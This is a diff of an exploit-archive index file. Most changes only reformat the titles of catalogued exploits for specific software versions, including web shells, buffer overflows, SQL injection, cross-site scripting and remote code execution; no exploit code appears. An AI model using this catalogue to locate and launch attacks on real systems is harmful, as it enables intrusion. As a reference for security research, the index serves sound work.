+24902,platforms/php/remote/24902.rb,"STUNSHELL Web Shell - Remote PHP Code Execution",2013-03-29,Metasploit,php,remote,0 24903,platforms/php/remote/24903.rb,"STUNSHELL Web Shell - Remote Code Execution",2013-03-29,Metasploit,php,remote,0 24904,platforms/windows/remote/24904.rb,"Java CMM - Remote Code Execution",2013-03-29,Metasploit,windows,remote,0 24905,platforms/multiple/remote/24905.rb,"v0pCr3w Web Shell - Remote Code Execution",2013-03-29,Metasploit,multiple,remote,0 @@ -22126,7 +22121,7 @@ id,file,description,date,author,platform,type,port 24979,platforms/multiple/remote/24979.txt,"XLReader 0.9 - Remote Client-Side Buffer Overflow",2004-12-16,"Kris Kubicki",multiple,remote,0 24980,platforms/multiple/remote/24980.txt,"Yanf 0.4 - HTTP Response Buffer Overflow",2004-12-15,"Ariel Berkman",multiple,remote,0 24981,platforms/multiple/remote/24981.txt,"JPegToAvi 1.5 - File List Buffer Overflow",2004-12-15,"James Longstreet",multiple,remote,0 -24982,platforms/multiple/remote/24982.txt,"Bolthole Filter 2.6.1 Address Parsing Buffer Overflow",2004-12-15,"Ariel Berkman",multiple,remote,0 +24982,platforms/multiple/remote/24982.txt,"Bolthole Filter 2.6.1 - Address Parsing Buffer Overflow",2004-12-15,"Ariel Berkman",multiple,remote,0 24983,platforms/multiple/remote/24983.txt,"Vilistextum 2.6.6 - HTML Attribute Parsing Buffer Overflow",2004-12-15,"Ariel Berkman",multiple,remote,0 24984,platforms/multiple/remote/24984.txt,"2Fax 3.0 Tab Expansion - Buffer Overflow",2004-12-15,"Ariel Berkman",multiple,remote,0 24985,platforms/php/remote/24985.txt,"PHP 4/5 - addslashes() NULL Byte Bypass",2004-12-16,"Daniel Fabian",php,remote,0 @@ -22159,20 +22154,20 @@ id,file,description,date,author,platform,type,port 25001,platforms/linux/remote/25001.rb,"GroundWork - monarch_scan.cgi OS Command Injection",2013-04-25,Metasploit,linux,remote,0 25002,platforms/php/webapps/25002.txt,"Hornbill Supportworks ITSM 1.0.0 - SQL Injection",2013-04-25,"Joseph Sheridan",php,webapps,0 25003,platforms/php/webapps/25003.txt,"phpMyAdmin 3.5.8 / 4.0.0-RC2 - Multiple Vulnerabilities",2013-04-25,waraxe,php,webapps,0 -25004,platforms/linux/dos/25004.txt,"QwikMail 0.3 HELO Command Buffer Overflow",2004-12-15,"Jonathan Rockway",linux,dos,0 +25004,platforms/linux/dos/25004.txt,"QwikMail 0.3 - HELO Command Buffer Overflow",2004-12-15,"Jonathan Rockway",linux,dos,0 25005,platforms/linux/remote/25005.txt,"NASM 0.98.x - Error Preprocessor Directive Buffer Overflow",2004-12-15,"Jonathan Rockway",linux,remote,0 25006,platforms/linux/remote/25006.txt,"RTF2LATEX2E 1.0 - Stack Buffer Overflow",2004-12-16,"Limin Wang",linux,remote,0 25007,platforms/windows/dos/25007.txt,"Convex 3D 0.8 - Buffer Overflow",2004-12-16,"Ariel Berkman",windows,dos,0 25008,platforms/linux/remote/25008.txt,"LinPopUp 1.2 - Remote Buffer Overflow",2004-12-15,"Stephen Dranger",linux,remote,0 -25009,platforms/windows/remote/25009.txt,"Gadu-Gadu 6.0 URL Parser Javascript XSS",2004-12-17,"Jaroslaw Sajko",windows,remote,0 +25009,platforms/windows/remote/25009.txt,"Gadu-Gadu 6.0 - URL Parser Javascript XSS",2004-12-17,"Jaroslaw Sajko",windows,remote,0 25010,platforms/linux/remote/25010.txt,"O3Read 0.0.3 - HTML Parser Buffer Overflow",2004-12-17,"Wiktor Kopec",linux,remote,0 25011,platforms/multiple/remote/25011.txt,"HTML2HDML 1.0.3 - File Conversion Buffer Overflow",2004-12-15,"Matthew Dabrowski",multiple,remote,0 25012,platforms/windows/dos/25012.c,"Easy Software Products LPPassWd 1.1.22 - Resource Limit Denial of Service",2004-12-11,"Bartlomiej Sieka",windows,dos,0 25013,platforms/windows/remote/25013.txt,"Interactive Studio GamePort 3.0/3.1/4.0 - Arbitrary application execution",2004-12-17,"amoXi & Dr.vaXin",windows,remote,0 25014,platforms/php/webapps/25014.txt,"WorkBoard 1.2 - Multiple Cross-Site Scripting Vulnerabilities",2004-12-17,Lostmon,php,webapps,0 25015,platforms/linux/remote/25015.txt,"Michael Kohn Ringtone Tools 2.22 - .EMelody File Remote Buffer Overflow",2004-12-15,"Qiao Zhang",linux,remote,0 -25016,platforms/windows/remote/25016.txt,"ASP2PHP 0.76.23 Preparse Token Variable Buffer Overflow",2004-12-15,"Qiao Zhang",windows,remote,0 -25017,platforms/linux/dos/25017.txt,"UML_Utilities User-Mode Linux uml_utilities 20030903 UML_Net Slip Network Interface Denial of Service",2004-12-15,"Danny Lungstrom",linux,dos,0 +25016,platforms/windows/remote/25016.txt,"ASP2PHP 0.76.23 - Preparse Token Variable Buffer Overflow",2004-12-15,"Qiao Zhang",windows,remote,0 +25017,platforms/linux/dos/25017.txt,"UML_Utilities User-Mode Linux - uml_utilities 20030903 UML_Net Slip Network Interface Denial of Service",2004-12-15,"Danny Lungstrom",linux,dos,0 25018,platforms/multiple/remote/25018.txt,"ABC2MTEX 1.6.1 - Process ABC Key Field Buffer Overflow",2004-12-15,"Limin Wang",multiple,remote,0 25019,platforms/multiple/remote/25019.txt,"ABC2MIDI 2004-12-04 - Multiple Stack Buffer Overflow Vulnerabilities",2004-12-15,"Limin Wang",multiple,remote,0 25020,platforms/windows/remote/25020.txt,"Michael Kohn VB2C 0.02 - .FRM File Remote Buffer Overflow",2004-12-15,"Qiao Zhang",windows,remote,0 @@ -22190,13 +22185,13 @@ id,file,description,date,author,platform,type,port 25031,platforms/windows/remote/25031.html,"Windows Media Player 9.0 - ActiveX Control Media File Attribute Corruption Weakness",2004-12-18,"Arman Nayyeri",windows,remote,0 25032,platforms/windows/remote/25032.html,"Windows Media Player 9.0 - ActiveX Control File Enumeration Weakness",2004-12-18,"Arman Nayyeri",windows,remote,0 25033,platforms/windows/remote/25033.txt,"GREED 0.81 - .GRX File List Buffer Overflow",2004-12-15,"Manigandan Radhakrishnan",windows,remote,0 -25034,platforms/windows/remote/25034.txt,"GREED 0.81 GRX File List Command Execution",2004-12-15,"Manigandan Radhakrishnan",windows,remote,0 +25034,platforms/windows/remote/25034.txt,"GREED 0.81 - .GRX File List Command Execution",2004-12-15,"Manigandan Radhakrishnan",windows,remote,0 25035,platforms/linux/remote/25035.txt,"PCAL 4.x - Calendar File getline Buffer Overflow",2004-12-15,"Danny Lungstrom",linux,remote,0 25036,platforms/linux/remote/25036.txt,"PCAL 4.x - Calendar File get_holiday Buffer Overflow",2004-12-15,"Danny Lungstrom",linux,remote,0 25037,platforms/php/webapps/25037.txt,"Kayako eSupport 2.x - index.php Knowledgebase XSS",2004-12-18,"James Bercegay",php,webapps,0 25038,platforms/php/webapps/25038.txt,"Kayako eSupport 2.x - Ticket System Multiple SQL Injection",2004-12-18,"James Bercegay",php,webapps,0 25039,platforms/aix/local/25039.txt,"IBM AIX 5.x - Diag Local Privilege Escalation Vulnerabilities",2004-12-20,cees-bart,aix,local,0 -25040,platforms/php/local/25040.php,"PHP 4.x/5.0 Shared Memory Module Offset Memory Corruption",2004-12-20,"Stefano Di Paola",php,local,0 +25040,platforms/php/local/25040.php,"PHP 4.x/5.0 Shared Memory Module - Offset Memory Corruption",2004-12-20,"Stefano Di Paola",php,local,0 25041,platforms/cgi/webapps/25041.txt,"escripts software e_board 4.0 - Directory Traversal",2004-12-20,white_e@nogimmick.org,cgi,webapps,0 25042,platforms/cgi/webapps/25042.txt,"Tlen.pl 5.23.4.1 - Instant Messenger Remote Script Execution",2004-12-20,"Jaroslaw Sajko",cgi,webapps,0 25043,platforms/php/webapps/25043.txt,"PHPGroupWare 0.9.14 - Tables_Update.Inc.php Remote File Inclusion",2004-01-27,"Cedric Cochin",php,webapps,0 @@ -22212,7 +22207,7 @@ id,file,description,date,author,platform,type,port 25053,platforms/php/webapps/25053.html,"Siteman 1.1 - User Database Privilege Escalation (2)",2005-01-19,amironline452,php,webapps,0 25054,platforms/linux/remote/25054.txt,"konversation irc client 0.15 - Multiple Vulnerabilities",2005-01-19,wouter@coekaerts.be,linux,remote,0 25055,platforms/osx/local/25055.c,"Darwin Kernel 7.1 - Mach File Parsing Local Integer Overflow",2005-01-19,nemo@felinemenace.org,osx,local,0 -25056,platforms/multiple/dos/25056.html,"Netscape Navigator 7.2 Infinite Array Sort Denial of Service",2005-01-21,"Berend-Jan Wever",multiple,dos,0 +25056,platforms/multiple/dos/25056.html,"Netscape Navigator 7.2 - Infinite Array Sort Denial of Service",2005-01-21,"Berend-Jan Wever",multiple,dos,0 25057,platforms/windows/remote/25057.txt,"DivX Player 2.6 - .Skin File Directory Traversal",2005-01-21,"Luigi Auriemma",windows,remote,0 25058,platforms/php/webapps/25058.txt,"Exponent CMS 0.95 - Multiple Cross-Site Scripting Vulnerabilities",2005-12-25,y3dips,php,webapps,0 25059,platforms/php/webapps/25059.txt,"MercuryBoard 1.1 - Multiple Input Validation Vulnerabilities",2005-01-25,"Alberto Trivero",php,webapps,0 @@ -22228,14 +22223,14 @@ id,file,description,date,author,platform,type,port 25069,platforms/php/webapps/25069.txt,"IceWarp Web Mail 5.3 - accountsettings_add.html accountid Parameter XSS",2005-01-28,ShineShadow,php,webapps,0 25070,platforms/linux/dos/25070.c,"ngIRCd 0.6/0.7/0.8 - Remote Buffer Overflow",2005-01-28,"Florian Westphal",linux,dos,0 25071,platforms/php/webapps/25071.txt,"Captaris Infinite Mobile Delivery Webmail 2.6 - Path Disclosure",2005-01-29,steven@lovebug.org,php,webapps,0 -25072,platforms/multiple/remote/25072.txt,"CitrusDB 0.1/0.2/0.3 Credit Card Data Remote Information Disclosure",2005-01-31,"Maximillian Dornseif",multiple,remote,0 +25072,platforms/multiple/remote/25072.txt,"CitrusDB 0.1/0.2/0.3 Credit Card Data - Remote Information Disclosure",2005-01-31,"Maximillian Dornseif",multiple,remote,0 25073,platforms/php/webapps/25073.txt,"JShop E-Commerce Suite 1.2 - Product.php Cross-Site Scripting",2005-01-31,SmOk3,php,webapps,0 25074,platforms/php/webapps/25074.txt,"xoops incontent module 3.0 - Directory Traversal",2005-01-28,Lostmon,php,webapps,0 25075,platforms/multiple/dos/25075.pl,"Eternal Lines Web Server 1.0 - Remote Denial of Service",2005-02-01,"Ziv Kamir",multiple,dos,0 25076,platforms/linux/dos/25076.c,"postgresql 7.x - Multiple Vulnerabilities",2005-02-01,ChoiX,linux,dos,0 25077,platforms/linux/dos/25077.txt,"Newspost 2.0/2.1 - Remote Buffer Overflow",2005-02-01,"Niels Heinen",linux,dos,0 25078,platforms/asp/webapps/25078.txt,"Eurofull E-Commerce - Mensresp.ASP Cross-Site Scripting",2005-02-02,Yani-ari,asp,webapps,0 -25079,platforms/multiple/remote/25079.txt,"People Can Fly Painkiller Gamespy 1.3 CD-Key Hash Remote Buffer Overflow",2005-02-02,"Luigi Auriemma",multiple,remote,0 +25079,platforms/multiple/remote/25079.txt,"People Can Fly Painkiller Gamespy 1.3 - CD-Key Hash Remote Buffer Overflow",2005-02-02,"Luigi Auriemma",multiple,remote,0 25080,platforms/linux/local/25080.txt,"Newsgrab 0.5.0pre4 - Multiple Local And Remote Vulnerabilities",2005-02-02,"Niels Heinen",linux,local,0 25081,platforms/multiple/dos/25081.txt,"LANChat Pro Revival 1.666c - UDP Processing Remote Denial of Service",2005-04-29,"Donato Ferrante",multiple,dos,0 25082,platforms/hardware/dos/25082.txt,"Linksys PSUS4 PrintServer - Malformed HTTP POST Request Denial of Service",2005-02-03,"laurent oudot",hardware,dos,0 @@ -22275,7 +22270,7 @@ id,file,description,date,author,platform,type,port 25119,platforms/php/webapps/25119.txt,"BibORB 1.3.2 - Add Database Description Parameter XSS",2005-02-17,"Patrick Hof",php,webapps,0 25120,platforms/php/webapps/25120.txt,"BibORB 1.3.2 - index.php Traversal Arbitrary File Manipulation",2005-02-17,"Patrick Hof",php,webapps,0 25121,platforms/php/webapps/25121.txt,"BibORB 1.3.2 Login Module - Multiple Parameter SQL Injection",2005-02-17,"Patrick Hof",php,webapps,0 -25122,platforms/linux/remote/25122.txt,"glFTPD 1.x/2.0 ZIP Plugins Multiple Directory Traversal Vulnerabilities",2005-02-18,"Paul Craig",linux,remote,0 +25122,platforms/linux/remote/25122.txt,"glFTPD 1.x/2.0 ZIP Plugins - Multiple Directory Traversal Vulnerabilities",2005-02-18,"Paul Craig",linux,remote,0 25123,platforms/php/webapps/25123.txt,"TrackerCam 5.12 - ComGetLogFile.php3 fm Parameter Traversal Arbitrary File Access",2005-02-18,"Luigi Auriemma",php,webapps,0 25124,platforms/hardware/dos/25124.txt,"Thomson TCW690 Cable Modem ST42.03.0a - Long GET Request DoS",2005-02-19,MurDoK,hardware,dos,0 25125,platforms/php/webapps/25125.txt,"ZeroBoard 4.1 - Multiple Cross-Site Scripting Vulnerabilities",2005-02-19,"albanian haxorz",php,webapps,0 @@ -22311,7 +22306,7 @@ id,file,description,date,author,platform,type,port 25155,platforms/php/webapps/25155.txt,"phpMyAdmin 2.6 - theme_right.css.php Multiple Parameter XSS",2005-02-24,"Maksymilian Arciemowicz",php,webapps,0 25156,platforms/php/webapps/25156.txt,"phpMyAdmin 2.6 - Multiple Local File Inclusion",2005-02-24,"Maksymilian Arciemowicz",php,webapps,0 25157,platforms/windows/remote/25157.txt,"Microsoft Log Sink Class - ActiveX Control Arbitrary File Creation",2003-04-29,"Shane Hird",windows,remote,0 -25158,platforms/php/webapps/25158.txt,"OOApp Guestbook Multiple HTML Injection Vulnerabilities",2005-02-24,m1o1d1,php,webapps,0 +25158,platforms/php/webapps/25158.txt,"OOApp Guestbook - Multiple HTML Injection Vulnerabilities",2005-02-24,m1o1d1,php,webapps,0 25159,platforms/jsp/webapps/25159.txt,"cyclades alterpath manager 1.1 - Multiple Vulnerabilities",2005-02-24,sullo@cirt.net,jsp,webapps,0 25160,platforms/php/webapps/25160.txt,"PunBB 3.0/3.1 - Multiple Remote Input Validation Vulnerabilities",2005-02-24,"John Gumbel",php,webapps,0 25161,platforms/php/webapps/25161.txt,"PHPWebSite 0.x - Image File Processing Remote Arbitrary PHP File Upload",2005-02-24,tjomka,php,webapps,0 @@ -22336,7 +22331,7 @@ id,file,description,date,author,platform,type,port 25180,platforms/php/webapps/25180.py,"PHPNews 1.2.3/1.2.4 - Auth.php Remote File Inclusion",2005-03-01,mozako,php,webapps,0 25181,platforms/windows/remote/25181.py,"Cerulean Studios Trillian 3.0 - Remote .PNG Image File Parsing Buffer Overflow",2005-03-02,"Tal Zeltzer",windows,remote,0 25182,platforms/php/webapps/25182.txt,"auraCMS 1.5 - Multiple Cross-Site Scripting Vulnerabilities",2005-03-02,"echo staff",php,webapps,0 -25195,platforms/windows/remote/25195.txt,"Oracle Database 8i/9i Multiple Remote Directory Traversal Vulnerabilities",2005-03-07,"Cesar Cerrudo",windows,remote,0 +25195,platforms/windows/remote/25195.txt,"Oracle Database 8i/9i - Multiple Remote Directory Traversal Vulnerabilities",2005-03-07,"Cesar Cerrudo",windows,remote,0 25196,platforms/windows/remote/25196.txt,"Yahoo! Messenger 5.x/6.0 - Offline Mode Status Remote Buffer Overflow",2005-03-08,"Mehrtash Mallahzadeh",windows,remote,0 25197,platforms/php/webapps/25197.txt,"PHP-Fusion 5.0 - BBCode IMG Tag Script Injection",2005-03-08,FireSt0rm,php,webapps,0 25198,platforms/jsp/webapps/25198.txt,"OutStart Participate Enterprise 3 - Multiple Access Validation Vulnerabilities",2005-03-08,Altrus,jsp,webapps,0 @@ -22361,8 +22356,8 @@ id,file,description,date,author,platform,type,port 25217,platforms/php/webapps/25217.html,"HolaCMS 1.2/1.4.x - Voting Module Remote File Corruption",2005-03-12,"Virginity Security",php,webapps,0 25218,platforms/windows/dos/25218.pl,"PlatinumFTPServer 1.0.18 - Multiple Malformed User Name Connection Denial of Service",2005-03-05,ports,windows,dos,0 25219,platforms/windows/dos/25219.txt,"Spinworks Application Server 3.0 - Remote Denial of Service",2005-03-15,dr_insane,windows,dos,0 -25220,platforms/php/webapps/25220.txt,"PABox 2.0 Post Icon HTML Injection",2005-03-14,Rift_XT,php,webapps,0 -25221,platforms/linux/remote/25221.txt,"Mozilla Suite/Firefox/Thunderbird Nested Anchor Tag Status Bar Spoofing Weakness",2005-03-14,"bitlance winter",linux,remote,0 +25220,platforms/php/webapps/25220.txt,"PABox 2.0 - Post Icon HTML Injection",2005-03-14,Rift_XT,php,webapps,0 +25221,platforms/linux/remote/25221.txt,"Mozilla Suite/Firefox/Thunderbird - Nested Anchor Tag Status Bar Spoofing Weakness",2005-03-14,"bitlance winter",linux,remote,0 25222,platforms/php/webapps/25222.html,"HolaCMS 1.2.x/1.4.x - Voting Module Directory Traversal Remote File Corruption",2005-03-13,"Virginity Security",php,webapps,0 25223,platforms/php/webapps/25223.txt,"Phorum 5.0.14 - Multiple Subject and Attachment HTML Injection Vulnerabilities",2005-03-14,"Jon Oberheide",php,webapps,0 25224,platforms/php/webapps/25224.txt,"SimpGB 1.0 - Guestbook.php SQL Injection",2005-03-14,visus,php,webapps,0 @@ -22392,7 +22387,7 @@ id,file,description,date,author,platform,type,port 25249,platforms/php/webapps/25249.txt,"Webid 1.0.6 - Multiple Vulnerabilities",2013-05-06,"Ahmed Aboul-Ela",php,webapps,0 25250,platforms/php/webapps/25250.txt,"OpenDocMan 1.2.6.5 - Persistent XSS",2013-05-06,drone,php,webapps,0 25251,platforms/hardware/webapps/25251.txt,"D-Link DSL-320B - Multiple Vulnerabilities",2013-05-06,m-1-k-3,hardware,webapps,0 -25252,platforms/asp/webapps/25252.txt,"betaparticle blog 2.0/3.0 dbBlogMX.mdb Direct Request Database Disclosure",2005-03-21,"farhad koosha",asp,webapps,0 +25252,platforms/asp/webapps/25252.txt,"betaparticle blog 2.0/3.0 - dbBlogMX.mdb Direct Request Database Disclosure",2005-03-21,"farhad koosha",asp,webapps,0 25253,platforms/asp/webapps/25253.txt,"betaparticle blog 2.0/3.0 - upload.asp Unauthenticated File Upload",2005-03-21,"farhad koosha",asp,webapps,0 25254,platforms/asp/webapps/25254.txt,"betaparticle blog 2.0/3.0 - myFiles.asp Unauthenticated File Manipulation",2005-03-21,"farhad koosha",asp,webapps,0 25255,platforms/windows/dos/25255.txt,"FUN labs Game Engine - Multiple Remote Denial of Service Vulnerabilities",2005-03-20,"Luigi Auriemma",windows,dos,0 @@ -22425,7 +22420,7 @@ id,file,description,date,author,platform,type,port 25282,platforms/php/webapps/25282.txt,"Nuke Bookmarks 0.6 - Marks.php Path Disclosure",2005-03-26,"Gerardo Astharot Di Giacomo",php,webapps,0 25283,platforms/php/webapps/25283.txt,"Nuke Bookmarks 0.6 - Multiple Cross-Site Scripting Vulnerabilities",2005-03-26,"Gerardo Astharot Di Giacomo",php,webapps,0 25284,platforms/php/webapps/25284.txt,"Nuke Bookmarks 0.6 - Marks.php SQL Injection",2005-03-26,"Gerardo Astharot Di Giacomo",php,webapps,0 -25285,platforms/php/webapps/25285.txt,"MagicScripts E-Store Kit-2 PayPal Edition Cross-Site Scripting",2005-03-26,Dcrab,php,webapps,0 +25285,platforms/php/webapps/25285.txt,"MagicScripts E-Store Kit-2 PayPal Edition - Cross-Site Scripting",2005-03-26,Dcrab,php,webapps,0 25286,platforms/php/webapps/25286.txt,"MagicScripts E-Store Kit-2 PayPal Edition - Remote File Inclusion",2005-03-26,Dcrab,php,webapps,0 25287,platforms/linux/dos/25287.c,"Linux Kernel 2.4.x / 2.6.x - Bluetooth Signed Buffer Index (Proof of Concept) (1)",2005-03-28,"ilja van sprundel",linux,dos,0 25288,platforms/linux/local/25288.c,"Linux Kernel 2.4.x / 2.6.x - Bluetooth Signed Buffer Index Local Root (2)",2005-04-08,qobaiashi,linux,local,0 @@ -22438,7 +22433,7 @@ id,file,description,date,author,platform,type,port 25297,platforms/linux/remote/25297.txt,"Dovecot with Exim sender_address Parameter - Remote Command Execution",2013-05-07,"RedTeam Pentesting GmbH",linux,remote,0 25298,platforms/php/webapps/25298.txt,"b2evolution 4.1.6 - Multiple Vulnerabilities",2013-05-07,"High-Tech Bridge SA",php,webapps,80 25299,platforms/php/webapps/25299.txt,"Tkai's Shoutbox - Query Parameter URI Redirection",2005-03-28,CorryL,php,webapps,0 -25300,platforms/php/webapps/25300.txt,"EXoops Multiple Input Validation Vulnerabilities",2005-03-28,"Diabolic Crab",php,webapps,0 +25300,platforms/php/webapps/25300.txt,"EXoops - Multiple Input Validation Vulnerabilities",2005-03-28,"Diabolic Crab",php,webapps,0 25301,platforms/php/webapps/25301.txt,"Valdersoft Shopping Cart 3.0 - Multiple Input Validation Vulnerabilities",2005-03-28,"Diabolic Crab",php,webapps,0 25302,platforms/php/webapps/25302.txt,"phpCOIN 1.2 - auxpage.php page Parameter Traversal Arbitrary File Access",2005-03-29,"James Bercegay",php,webapps,0 25303,platforms/linux/dos/25303.txt,"Multiple Vendor Telnet Client - Env_opt_add Heap-Based Buffer Overflow",2005-03-28,"Gael Delalleau",linux,dos,0 @@ -22454,37 +22449,37 @@ id,file,description,date,author,platform,type,port 25312,platforms/php/webapps/25312.txt,"PhotoPost Pro 5.1 - showphoto.php photo Parameter SQL Injection",2005-03-28,"Diabolic Crab",php,webapps,0 25313,platforms/asp/webapps/25313.txt,"ACS Blog 0.8/0.9/1.0/1.1 - Name Field HTML Injection",2005-03-28,"Dan Crowley",asp,webapps,0 25314,platforms/php/webapps/25314.txt,"The Includer 1.0/1.1 - Remote File Inclusion",2005-03-29,"hoang yen",php,webapps,0 -25315,platforms/php/webapps/25315.html,"Chatness 2.5 Message Form Field HTML Injection",2005-03-29,3nitro,php,webapps,0 +25315,platforms/php/webapps/25315.html,"Chatness 2.5 - Message Form Field HTML Injection",2005-03-29,3nitro,php,webapps,0 25316,platforms/php/webapps/25316.txt,"CPG Dragonfly 9.0.2.0 - Multiple Cross-Site Scripting Vulnerabilities",2005-03-29,mircia,php,webapps,0 25317,platforms/php/webapps/25317.txt,"Uapplication Ublog 1.0.x - Cross-Site Scripting",2005-03-29,"PersianHacker Team",php,webapps,0 25318,platforms/asp/webapps/25318.txt,"Iatek IntranetApp 2.3 - ad_click.asp banner_id Parameter SQL Injection",2005-03-29,"Diabolic Crab",asp,webapps,0 -25319,platforms/windows/remote/25319.txt,"FastStone 4in1 Browser 1.2 Web Server Remote Directory Traversal",2005-03-29,"Donato Ferrante",windows,remote,0 +25319,platforms/windows/remote/25319.txt,"FastStone 4in1 Browser 1.2 - Web Server Remote Directory Traversal",2005-03-29,"Donato Ferrante",windows,remote,0 25320,platforms/php/webapps/25320.txt,"Lighthouse Development Squirrelcart 1.5.5 - SQL Injection",2005-03-29,"Diabolic Crab",php,webapps,0 25321,platforms/linux/remote/25321.c,"YepYep MTFTPD 0.2/0.3 - Remote CWD Argument Format String",2005-03-30,gunzip,linux,remote,0 25322,platforms/linux/dos/25322.c,"Linux Kernel 2.6.10 - File Lock Local Denial of Service",2005-03-30,ChoiX,linux,dos,0 25323,platforms/php/webapps/25323.txt,"InterAKT Online MX Shop 1.1.1 - SQL Injection",2005-03-31,Dcrab,php,webapps,0 25324,platforms/asp/webapps/25324.txt,"ASP-DEV XM Forum RC3 - IMG Tag Script Injection",2005-03-31,Zinho,asp,webapps,0 -25325,platforms/windows/remote/25325.txt,"BlueSoleil 1.4 Object Push Service Bluetooth File Upload Directory Traversal",2005-04-01,"Kevin Finisterre",windows,remote,0 +25325,platforms/windows/remote/25325.txt,"BlueSoleil 1.4 - Object Push Service Bluetooth File Upload Directory Traversal",2005-04-01,"Kevin Finisterre",windows,remote,0 25326,platforms/windows/dos/25326.txt,"RUMBA 7.3/7.4 - Profile Handling Multiple Buffer Overflow Vulnerabilities",2005-04-01,"Bahaa Naamneh",windows,dos,0 25327,platforms/php/webapps/25327.txt,"AlstraSoft EPay Pro 2.0 - Remote File Inclusion",2005-04-01,Dcrab,php,webapps,0 25328,platforms/php/webapps/25328.txt,"AlstraSoft EPay Pro 2.0 - Multiple Cross-Site Scripting Vulnerabilities",2005-04-01,Dcrab,php,webapps,0 25329,platforms/windows/dos/25329.cfg,"Star Wars Jedi Knight: Jedi Academy 1.0.11 - Buffer Overflow",2005-04-02,"Luigi Auriemma",windows,dos,0 25330,platforms/php/webapps/25330.txt,"phpMyAdmin 2.x - Convcharset Cross-Site Scripting",2005-04-03,"Oriol Torrent Santiago",php,webapps,0 -25331,platforms/cgi/webapps/25331.txt,"SonicWALL SOHO 5.1.7 Web Interface Multiple Remote Input Validation Vulnerabilities",2005-04-04,"Oliver Karow",cgi,webapps,0 +25331,platforms/cgi/webapps/25331.txt,"SonicWALL SOHO 5.1.7 Web Interface - Multiple Remote Input Validation Vulnerabilities",2005-04-04,"Oliver Karow",cgi,webapps,0 25332,platforms/asp/webapps/25332.txt,"SiteEnable - SQL Injection",2005-04-02,Zinho,asp,webapps,0 -25333,platforms/unix/local/25333.c,"SCO OpenServer 5.0.6/5.0.7 NWPrint Command Line Argument Local Buffer Overflow",2005-04-04,"pasquale minervini",unix,local,0 -25334,platforms/linux/dos/25334.txt,"Mozilla Suite/Firefox JavaScript Lambda Replace Heap Memory Disclosure",2005-04-04,"Daniel McNeil",linux,dos,0 -25335,platforms/unix/remote/25335.txt,"IBM iSeries AS400 LDAP Server Remote Information Disclosure",2005-04-04,"Shalom Carmel",unix,remote,0 +25333,platforms/unix/local/25333.c,"SCO OpenServer 5.0.6/5.0.7 - NWPrint Command Line Argument Local Buffer Overflow",2005-04-04,"pasquale minervini",unix,local,0 +25334,platforms/linux/dos/25334.txt,"Mozilla Suite/Firefox - JavaScript Lambda Replace Heap Memory Disclosure",2005-04-04,"Daniel McNeil",linux,dos,0 +25335,platforms/unix/remote/25335.txt,"IBM iSeries AS400 LDAP Server - Remote Information Disclosure",2005-04-04,"Shalom Carmel",unix,remote,0 25336,platforms/windows/remote/25336.txt,"Logics Software LOG-FT - Arbitrary File Disclosure",2005-04-05,"Pedro Viuales and Rom Ramirez",windows,remote,0 25337,platforms/php/webapps/25337.txt,"ProfitCode Software PayProCart 3.0 - Usrdetails.php Cross-Site Scripting",2005-04-05,"Diabolic Crab",php,webapps,0 25338,platforms/php/webapps/25338.txt,"profitcode software payprocart 3.0 - Directory Traversal",2005-04-05,"Diabolic Crab",php,webapps,0 25339,platforms/php/webapps/25339.txt,"PHP-Nuke 6.x/7.x - Your_Account Module Username Cross-Site Scripting",2005-04-05,sp3x@securityreason.com,php,webapps,0 25340,platforms/php/webapps/25340.txt,"PHP-Nuke 6.x/7.x - Your_Account Module Avatarcategory Cross-Site Scripting",2005-04-05,sp3x@securityreason.com,php,webapps,0 25341,platforms/php/webapps/25341.html,"PHP-Nuke 6.x/7.x - Downloads Module Lid Parameter Cross-Site Scripting",2005-04-05,sp3x@securityreason.com,php,webapps,0 -25342,platforms/php/webapps/25342.txt,"PHP-Nuke 7.6 Web_Links Module Multiple Cross-Site Scripting Vulnerabilities",2005-04-06,"Maksymilian Arciemowicz",php,webapps,0 +25342,platforms/php/webapps/25342.txt,"PHP-Nuke 7.6 - Web_Links Module Multiple Cross-Site Scripting Vulnerabilities",2005-04-06,"Maksymilian Arciemowicz",php,webapps,0 25343,platforms/php/webapps/25343.txt,"PHP-Nuke 7.6 - Banners.php Cross-Site Scripting",2005-04-06,"Maksymilian Arciemowicz",php,webapps,0 -25344,platforms/php/webapps/25344.txt,"PHPBB 2.0.13 DLMan Pro Module SQL Injection",2005-04-06,"LovER BOY",php,webapps,0 -25345,platforms/php/webapps/25345.txt,"PHPBB 2.0.13 Linkz Pro Module SQL Injection",2005-04-06,"LovER BOY",php,webapps,0 +25344,platforms/php/webapps/25344.txt,"PHPBB 2.0.13 DLMan Pro Module - SQL Injection",2005-04-06,"LovER BOY",php,webapps,0 +25345,platforms/php/webapps/25345.txt,"PHPBB 2.0.13 Linkz Pro Module - SQL Injection",2005-04-06,"LovER BOY",php,webapps,0 25346,platforms/asp/webapps/25346.txt,"Active Auction House - Default.ASP Multiple SQL Injection",2005-04-06,Dcrab,asp,webapps,0 25347,platforms/asp/webapps/25347.txt,"Active Auction House - ItemInfo.ASP SQL Injection",2005-04-06,Dcrab,asp,webapps,0 25348,platforms/asp/webapps/25348.txt,"Active Auction House - start.asp ReturnURL Parameter XSS",2005-04-06,Dcrab,asp,webapps,0 @@ -22493,14 +22488,14 @@ id,file,description,date,author,platform,type,port 25351,platforms/asp/webapps/25351.txt,"Active Auction House - Sendpassword.ASP Multiple Cross-Site Scripting Vulnerabilities",2005-04-06,Dcrab,asp,webapps,0 25352,platforms/asp/webapps/25352.txt,"Active Auction House - WatchThisItem.ASP Cross-Site Scripting",2005-04-06,Dcrab,asp,webapps,0 25353,platforms/unix/dos/25353.txt,"IBM Lotus Domino Server 6.5.1 Web Service - Remote Denial of Service",2005-04-06,anonymous,unix,dos,0 -25354,platforms/php/webapps/25354.txt,"Ocean12 Membership Manager Pro Cross-Site Scripting",2005-04-06,Zinho,php,webapps,0 +25354,platforms/php/webapps/25354.txt,"Ocean12 Membership Manager Pro - Cross-Site Scripting",2005-04-06,Zinho,php,webapps,0 25355,platforms/php/webapps/25355.txt,"CubeCart 2.0.x - index.php Multiple Variable Path Disclosure",2005-04-06,"John Cobb",php,webapps,0 25356,platforms/php/webapps/25356.txt,"CubeCart 2.0.x - tellafriend.php product Variable Path Disclosure",2005-04-06,"John Cobb",php,webapps,0 25357,platforms/php/webapps/25357.txt,"CubeCart 2.0.x - view_cart.php add Variable Path Disclosure",2005-04-06,"John Cobb",php,webapps,0 25358,platforms/php/webapps/25358.txt,"CubeCart 2.0.x - view_product.php product Variable Path Disclosure",2005-04-06,"John Cobb",php,webapps,0 